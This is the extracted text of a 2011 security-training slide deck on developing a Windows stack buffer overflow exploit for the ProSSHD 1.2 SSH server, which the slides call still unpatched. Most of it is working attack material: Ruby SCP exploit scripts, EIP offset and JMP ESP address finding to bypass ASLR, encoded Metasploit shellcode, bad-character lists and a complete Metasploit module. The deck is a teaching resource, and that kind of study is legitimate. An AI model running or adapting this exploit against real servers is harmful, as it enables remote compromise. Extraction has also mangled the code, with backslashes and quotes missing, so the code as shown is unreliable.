2011-03 Developing Windows Exploits

Real
Windows
Exploits
Allen Harper

1

ProSSHD Vulnerability

Binary can be found at: http://www.exploit-db.com/application/11618

STILL NOT FIXED…0-days still work…

2

Install ProSSHD in vmware
•  Set up W7 vmware client, host only mode.
•  Determine vmware client IP.
•  Ping vmware client from host system.
•  Install Demo ProSSHD inside vm, run it.

3

Exploit Development Process
•  Crash Program in Debugger
•  Control EIP (next instruction)
•  Determine Offset of Overwrite to EIP
•  Determine Opcode to return to (new EIP)
•  Determine Space Constraints
•  Select and Test Shellcode
•  Build Exploit Sandwich
•  Determine Bad Characters

4

Immunity Debugger
•  Fork from OllyDbg
•  Still looks and feels like OllyDbg
•  Adds a Python Command Shell
•  Allows for more automation
•  pvefindaddr is a great plugin tool for
exploit development! http://corelan.be
•  Note: there was a problem with 1.74
•  Current version is 1.80
5

Save Snapshot, Attach Debugger
•  In Vmware, save snapshot (prior to sending)
•  Send Exploit, with Sleep(15) before send
•  File->Attach->wsshd.exe (may need to sort)
•  In debugger, hit F9 to continue process

6

Crash the ProSSHD Server
•  From host, crash remote server, control EIP
#prosshd1.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1' #need to set this up on the test victim (os account)
password = 'test1' #need to set this up on the test victim machine
host = '10.10.10.143
port = 22
# use A's to overwrite eip
get_request = "x41" * 516
# lets do it…
Net::SSH.start( host, username, :password => password) do|ssh|
sleep(15) # gives us time to attach to wsshd.exe
ssh.scp.download!( get_request, "foo.txt )# 2 params:remote,local file
end

• Run exploit with ruby prosshd1.rb
• Attach debugger to wsshd.exe, after it loads, Hit F9 twice

7

Determine the Offset(s)
•  Revert VM, then use Pattern_Create
#prosshd2.rb
%w{rubygems net/ssh net/scp}.each { |x| require x }
username = 'test1' #need to set this up on the test victim (os account)
password = 'test1' #need to set this up on the test victim machine
host = '10.10.10.143
port = 22
# use A's to overwrite eip
get_request=
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A
c4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8
Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah
3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7A
j8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2
Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao
7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
# lets do it…
Net::SSH.start( host, username, :password => password) do|ssh|
sleep(15) # gives us time to attach to wsshd.exe
ssh.scp.download!( get_request, "foo.txt )# 2 params:remote,local file
end
Run exploit with ruby prosshd2.rb
8

•  Attach Debugger to wsshd.exe
•  After it loads, hit F9 twice

9


10

Determine Op-Codes to Return to
•  Determine the Control Vector, we could:
–  JMP ESP
–  RETN

•  We choose JMP ESP
•  Could use msfpescan on ntdll.dll

11

Determine Op-Codes to Return to
•  Problem: Vista and beyond protect
NTDLL.DLL with ASLR
•  Need to find a non-ASLR module
•  This is the best way to bypass ASLR
•  pvefindaddr is the tool of choice
•  Run with !pvefindaddr j –r esp -n in
ImmDbg
•  Results in file j.txt:
•  C:Users[your name here]AppDataLocalVirtualStoreProgram Files
Immunity IncImmunity Debugger !

12

Determine Op-Code Address
==================================================================!
pvefindaddr v1.32 corelanc0d3r - http://www.corelan.be:8800!
-----Loaded modules ---------------------------------------------- !
Fixup | Base | Top | Size | SafeSEH | ASLR |NXCompat
| Modulename & Path!
----------------------------------------------------------------!
NO | 0x7C340000 | 0x7C396000 | 0x00056000 | yes | NO | NO
|MSVCR71.dll:C:UsersPublicProgram FilesLab-NCProSSHDMSVCR71.dll!
yes | 0x76210000 | 0x762E4000 | 0x000D4000 | yes | yes | yes
| kernel32.dll : C:Windowssystem32kernel32.dll!
yes | 0x77A50000 | 0x77B8C000 | 0x0013C000 | yes | yes | yes
| ntdll.dll : C:WindowsSYSTEM32ntdll.dll !
<truncated for brevity>!
NO | 0x00400000 | 0x00457000 | 0x00057000 | yes | NO | NO
| wsshd.exe : C:UsersPublicProgram FilesLab-NCProSSHDwsshd.exe!
Found push esp - ret at 0x7C345C30 [msvcr71.dll] - [Ascii printable]
{PAGE_EXECUTE_READ} [SafeSEH: Yes - ASLR: ** No (Probably not) **]
[Fixup: ** NO **] - !
C:UsersPublicProgram FilesLab-NCProSSHDMSVCR71.dll 

13

Find Space Constraints
•  Crash with 2000 A s, calculate depth of
buffer
#prosshd3.rb …truncated for brevity…!
get_request = "x41" * 492 + "x42x42x42x42" +
x41 * 2000!
•  Run, Attach, Crash, inspect stack for buffer size!

0x0012f758-0x0012ef88= 2000

So we can ﬁt 2000 bytes of
shellcode into the buffer!

14

Select and Test Shellcode
•  Generate your shellcode (switching to C)
$ msfpayload windows/exec cmd=calc.exe R | msfencode -b 'x00x0a' -e x86/
shikata_ga_nai –t c sc.txt!
!

•  Take that shellcode and copy paste into the following harness

//shellcode.c char shellcode[] = //copy paste from above!
x31xc0x31... your shellcode goes here;!
int main() { !//main function !
int *ret; !//ret pointer for saved ret !
ret = (int *)ret + 2;! //set ret to point to the saved return!
(*ret) = (int)shellcode; //change the saved ret to addr of shellcode!
}!

15

Select and Test Shellcode

Notice: we disabled DEP (/NXCOMPAT)… does not matter here as our vulnerable
program is not linked with /NXCOMPAT by default.

16

Build Exploit Sandwich
# prosshd4.rb 
%w{rubygems net/ssh net/scp}.each { |x| require x } 
username = 'test1' 
password = 'test1  
host = '10.10.10.143' 
port = 22 
shell= # [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)  
xd9xccx31xc9xb1x33xd9x74x24xf4x5bxbax99xe4x93 + 
x62x31x53x18x03x53x18x83xc3x9dx06x66x9ex75x4f + 
x89x5fx85x30x03xbaxb4x62x77xcexe4xb2xf3x82x04 +  
x38x51x37x9fx4cx7ex38x28xfax58x77xa9xcax64xdb +  
x69x4cx19x26xbdxaex20xe9xb0xafx65x14x3axfdx3e +  
x52xe8x12x4ax26x30x12x9cx2cx08x6cx99xf3xfcxc6 +  
xa0x23xacx5dxeaxdbxc7x3axcbxdax04x59x37x94x21 +  
xaaxc3x27xe3xe2x2cx16xcbxa9x12x96xc6xb0x53x11 +  
x38xc7xafx61xc5xd0x6bx1bx11x54x6exbbxd2xcex4a +  
x3dx37x88x19x31xfcxdex46x56x03x32xfdx62x88xb5 +  
xd2xe2xcax91xf6xafx89xb8xafx15x7cxc4xb0xf2x21 +  
x60xbax11x36x12xe1x7fxc9x96x9fx39xc9xa8x9fx69 +  
xa1x99x14xe6xb6x25xffx42x48x6cxa2xe3xc0x29x36 +  
xb6x8dxc9xecxf5xabx49x05x86x48x51x6cx83x15xd5 +  
x9cxf9x06xb0xa2xaex27x91xc0x31xbbx79x29xd7x3b +  
x1bx35x1d; 
# Overwrite eip with jmp esp (0x7c345c30) of msvcr71.dll 
get_request = x41 * 492 + x30x5Cx34x7C + x90 * 1000 + xcc + shell 
# lets do it... 
Net::SSH.start( host, username, :password = password) do|ssh| 
sleep(15) # gives us time to attach to wsshd.exe 
ssh.scp.download!( get_request, foo.txt) # 2 params: remote file, local file 
end !

17

Test Exploit with Debugger
•  Run with ruby prosshd4.rb
•  Hit F9 twice to hit breakpoint

•  Hit F9 to Continue, if crash, then bad
character.

18

Find Bad Characters
•  Revert VM, resend exploit, step through
•  Tip 1: right click on halted instruction, follow in dump…

Shellcode is
mangled…
why? bad
char x0a

19

Build new Shellcode
# msfpayload windows/exec cmd=calc.exe R | msfencode -b 'x00x0ax20' -e x86/
shikata_ga_nai -t ruby!
# [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1) !
shell = !
x33xc9xb1x33xbdxe3x34x37xfbxdbxc6xd9x74x24 +!
xf4x5fx31x6fx0fx83xefxfcx03x6fxe8xd6xc2x07 +!
x06x9fx2dxf8xd6xc0xa4x1dxe7xd2xd3x56x55xe3 +!
x90x3bx55x88xf5xafxeexfcxd1xc0x47x4ax04xee +!
x58x7ax88xbcx9ax1cx74xbfxcexfex45x70x03xfe +!
x82x6dxebx52x5axf9x59x43xefxbfx61x62x3fxb4 +!
xd9x1cx3ax0bxadx96x45x5cx1dxacx0ex44x16xea + !
xaex75xfbxe8x93x3cx70xdax60xbfx50x12x88xf1 +!
x9cxf9xb7x3dx11x03xffxfaxc9x76x0bxf9x74x81 +!
xc8x83xa2x04xcdx24x21xbex35xd4xe6x59xbdxda +!
x43x2dx99xfex52xe2x91xfbxdfx05x76x8ax9bx21 +!
x52xd6x78x4bxc3xb2x2fx74x13x1ax90xd0x5fx89 +!
xc5x63x02xc4x18xe1x38xa1x1axf9x42x82x72xc8 +!
xc9x4dx05xd5x1bx2axf9x9fx06x1bx91x79xd3x19 +!
xfcx79x09x5dxf8xf9xb8x1exffxe2xc8x1bx44xa5 +!
x21x56xd5x40x46xc5xd6x40x25x88x44x08x84x2f +!
xecxabxd8xa5
Good list of bad chars: 00 0a 09 20 21

20

Metasploit Decoders
•  Require space on the stack to decode
•  Modules use stackadjustment parameter
•  You may want to add 16 bytes of NOP to
beginning of payload to be safe.

21

Success!
•  Revert VM to running state
•  Launch Exploit with new shellcode
•  Remove xcc, replace with x90, fire off exploit
•  P0wn3d!!!!! Where do you want to go today!

22

Automating
•  Metasploit as you have seen is an
excellent tool for both exploit development
and execution.
•  You should look at existing modules, best
way to learn techniques.
•  There is no ProSSHD module L
•  We will create one and automate our
attack!
23

Metasploit Module Sections
•  Header
•  Initialize Section ( bad chars, targets)
•  Exploit Section (guts of sploit, protocol)

24

Header
##!
# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $!
##!
!
##!
# This file is part of the Metasploit Framework and may be subject to!
# redistribution and commercial restrictions. Please see the Metasploit!
# Framework web site for more information on licensing and terms of use.!
# http://metasploit.com/framework/!
##!
!
require 'msf/core'!
%w{rubygems net/ssh net/scp}.each { |x| require x }!
!
class Metasploit3 Msf::Exploit::Remote!
!Rank = AverageRanking!
!
!include Msf::Exploit::Remote::Tcp!

25

Initialize Section
!def initialize(info = {})!
! !super(update_info(info,!
! !'Name' = 'ProSSHD 1.2.x SCP-GET Buffer Overflow',!
! !'Description' = %q{!
! !This module exploits a simple stack buffer overflow in ProSSHD 1.2.!
! !This flaw is due to a buffer overflow error when handling a specially!
! !crafted scp get request from an SSH client.!
! !**Based on original Exploit by S2 Crew [Hungary]!
! !},!
! !'Author' = 'AAH',!
! !'License' = MSF_LICENSE,!
! !'Version' = '$Revision: 10000 $',!
! !'References' = [],!
! !'DefaultOptions' = {'EXITFUNC' = 'process ,},!
! !'Payload' = {'Space' = 1000,!
! ! ! 'BadChars' = x00x09x0ax20x21,!
! ! ! 'StackAdjustment' = -3500,},!
! !'Platform' = 'win',!
! !'Targets' = [[ 'Windows 7', { 'Ret' = 0x7c345c30 } ],],!
! !'Privileged' = true,!
! !'DisclosureDate' = 'March 3, 2010',!
! !'DefaultTarget' = 0))!
! !register_options([ !
OptString.new('USERNAME', [ true, 'The username to authenticate as' ]), !
! OptString.new('PASSWORD', [ true, 'The password for the specified username' ]),!
! ! Opt::RPORT(22)], self.class)!
!end!
!

26

Exploit Section
def exploit!
! !!
!!
get_request = x41 * 492 + !
[target.ret].pack(‘V’) + !
x90 * 1000 +!
!payload.encoded # shellcode 8)!
! !
! !print_status(Trying to connect to #{datastore['RHOST']}...)!
! !!
! !# lets do it...!
! !Net::SSH.start( datastore['RHOST'], datastore['USERNAME'], :password = datastore
['PASSWORD']) do|ssh|!
! ! #sleep(15) # gives us time to attach to wsshd.exe!
! print_status(Sending sploit to #{datastore['RHOST']}...)!
! ! ssh.scp.download!( get_request, foo.txt) # 2 params: remote file, local file!
! !end!
! !handler!
!end!
end!
!

27

Setup
•  Next, install the following rubygems
•  Have to run CygShell as Administrator (on older MSF)
•  Right click on it in start menu, select run as
Administrator

28

Runit
•  Restart vulnerable server
•  Run Metasploit Console

29

2011-03 Developing Windows Exploits

More Related Content

What's hot (20)

Similar to 2011-03 Developing Windows Exploits (20)

More from Raleigh ISSA (20)

Recently uploaded (20)

2011-03 Developing Windows Exploits